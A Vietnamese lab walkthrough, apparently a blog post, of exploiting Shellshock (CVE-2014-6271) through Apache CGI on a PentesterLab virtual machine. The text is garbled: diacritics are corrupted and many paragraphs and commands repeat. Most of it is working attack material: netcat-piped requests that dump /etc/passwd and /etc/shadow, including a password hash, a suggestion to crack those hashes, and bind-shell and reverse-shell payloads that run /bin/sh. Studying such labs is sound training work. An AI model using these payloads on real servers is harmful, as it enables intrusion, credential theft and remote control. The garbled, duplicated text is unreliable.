L? h?ng Shellshock cho ph�p attackers th?c hi?n c�c l?nh bash t? xa m� kh�ng ph?i x�c th?c
1. L? h?ng shellshock
L? h?ng tr�n h? di?u h�nh Linux, cho ph�p attackers c� th? th?c thi tr�i ph�p c�c l?nh bash t? xa m� kh�ng ph?i qua b?t c? qu� tr�nh x�c th?c n�o.
B�i vi?t s? t?p trung v�o Shellshock CVE-2014-6271 Apache mod_cgi - Remote Exploit
Ngo�i CVE-2014-6271, Shellshock c�n c� nh?ng phi�n b?n nhu CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
2. Co ch? ho?t d?ng
Khi m?t web server s? d?ng CGI d? x? l� m?t request, n� truy?n c�c th�ng tin c� trong request t?i chuong tr�nh x? l� s? d?ng c�c bi?n m�i tru?ng. V� d?, bi?n HTTP_USER_AGENT th�ng thu?ng ch?a t�n chuong tr�nh g?i request d?n web server. N?u tr�nh x? l� request l� m?t Bash script, ho?c n?u n� th?c thi m?t l?nh n�o d� v� d? nhu vi?c s? d?ng system call, Bash s? nh?n v�o c�c bi?n m�i tru?ng du?c truy?n v�o b?i server v� x? l� ch�ng. K? t?n c�ng s? d?ng phuong th?c n�y d? k�ch ho?t t?n c�ng Shellshock v?i m?t request d?c bi?t t?i server.
L? h?ng tr�n h? di?u h�nh Linux, cho ph�p attackers c� th? th?c thi tr�i ph�p c�c l?nh bash t? xa m� kh�ng ph?i qua b?t c? qu� tr�nh x�c th?c n�o.
B�i vi?t s? t?p trung v�o Shellshock CVE-2014-6271 Apache mod_cgi - Remote Exploit
Ngo�i CVE-2014-6271, Shellshock c�n c� nh?ng phi�n b?n nhu CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
2. Co ch? ho?t d?ng
Khi m?t web server s? d?ng CGI d? x? l� m?t request, n� truy?n c�c th�ng tin c� trong request t?i chuong tr�nh x? l� s? d?ng c�c bi?n m�i tru?ng. V� d?, bi?n HTTP_USER_AGENT th�ng thu?ng ch?a t�n chuong tr�nh g?i request d?n web server. N?u tr�nh x? l� request l� m?t Bash script, ho?c n?u n� th?c thi m?t l?nh n�o d� v� d? nhu vi?c s? d?ng system call, Bash s? nh?n v�o c�c bi?n m�i tru?ng du?c truy?n v�o b?i server v� x? l� ch�ng. K? t?n c�ng s? d?ng phuong th?c n�y d? k�ch ho?t t?n c�ng Shellshock v?i m?t request d?c bi?t t?i server.
II. C�i d?t lab
T?i file iso t? https://www.pentesterlab.com/exercises/cve-2014-6271/ v� c�i d?t l�n m�y ?o
Thi?t l?p m?ng bridge ho?c host only cho m�y ?o
T?i file iso t? https://www.pentesterlab.com/exercises/cve-2014-6271/ v� c�i d?t l�n m�y ?o
Thi?t l?p m?ng bridge ho?c host only cho m�y ?o
III. Th?c h�nh
Scan l? h?ng b?ng nikto
nikto cho result
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
Khai th�c l?y th�ng tin t? server:
L?y th�ng tin t? file passwd
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Trong d� <IP> l� IP server d�nh l? h?ng (IP m�y ?o)
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
Khai th�c l?y th�ng tin t? server:
L?y th�ng tin t? file passwd
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Trong d� <IP> l� IP server d�nh l? h?ng (IP m�y ?o)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Ta l?y du?c th�ng tin:
Ta l?y du?c th�ng tin:
HTTP/1.1 200 OK
Date: Sat, 29 Oct 2016 09:10:16 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: x:0:0:root:/root:/bin/sh
lp: x:7:7:lp:/var/spool/lpd:/bin/sh
nobody: x:65534:65534:nobody:/nonexistent:/bin/false
tc: x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab: x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
Content-Length: 177
Connection: close
Content-Type: application/json
Date: Sat, 29 Oct 2016 09:10:16 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: x:0:0:root:/root:/bin/sh
lp: x:7:7:lp:/var/spool/lpd:/bin/sh
nobody: x:65534:65534:nobody:/nonexistent:/bin/false
tc: x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab: x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
Content-Length: 177
Connection: close
Content-Type: application/json
Ta ti?p t?c l?y th�ng tin t? file /etc/shadow
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/shadow)\r\nHost: 192.168.1.157\r\nConnection: close\r\n\r\n" | nc 192.168.1.157 80
HTTP/1.1 200 OK
Date: Sat, 29 Oct 2016 09:13:25 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: *:13525:0:99999:7:::
lp: *:13510:0:99999:7:::
nobody: *:13509:0:99999:7:::
tc: :13646:0:99999:7:::
pentesterlab: $1$yN4NnWo7$xfRT1i1pDL6qqX/wsE0Cx/:17103:0:99999:7:::
Content-Length: 177
Connection: close
Content-Type: application/json
Date: Sat, 29 Oct 2016 09:13:25 GMT
Server: Apache/2.2.21 (Unix) DAV/2
root: *:13525:0:99999:7:::
lp: *:13510:0:99999:7:::
nobody: *:13509:0:99999:7:::
tc: :13646:0:99999:7:::
pentesterlab: $1$yN4NnWo7$xfRT1i1pDL6qqX/wsE0Cx/:17103:0:99999:7:::
Content-Length: 177
Connection: close
Content-Type: application/json
T? 2 file n�y, ta c� th? d�ng c�c ph?n m?m crack password d? l?y password c?a qu?n tr? vi�n
Ki?m so�t victim b?ng netcat
C�ch 1: m? 1 port tr�n m�y victim (bind)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p <port> -e /bin/sh\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Sau d� ta th?c hi?n k?t n?i d?n m�y n?n nh�n b?ng l?nh
nc <IP> <port>
C�ch 1: m? 1 port tr�n m�y victim (bind)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p <port> -e /bin/sh\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Sau d� ta th?c hi?n k?t n?i d?n m�y n?n nh�n b?ng l?nh
nc <IP> <port>
(terminal s? kh�ng hi?n b?t c? th�ng b�o n�o cho th?y m�y t�nh d� du?c k?t n?i th�nh c�ng)
C�ch 2: t?o listener tr�n m�y m�nh v� d? victim k?t n?i ngu?c (reverse)
�?u ti�n, ta s? t?o 1 listener tr�n m�y b?ng l?nh
�?u ti�n, ta s? t?o 1 listener tr�n m�y b?ng l?nh
nc -l -p <port>
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc <my_IP> <my_port> -e /bin/sh\r\nHost: <IP>\r\nConnection: close\r\n\r\n" | nc <IP> 80
Huy?t MA
Ngu?n: pentesterlab
No comments: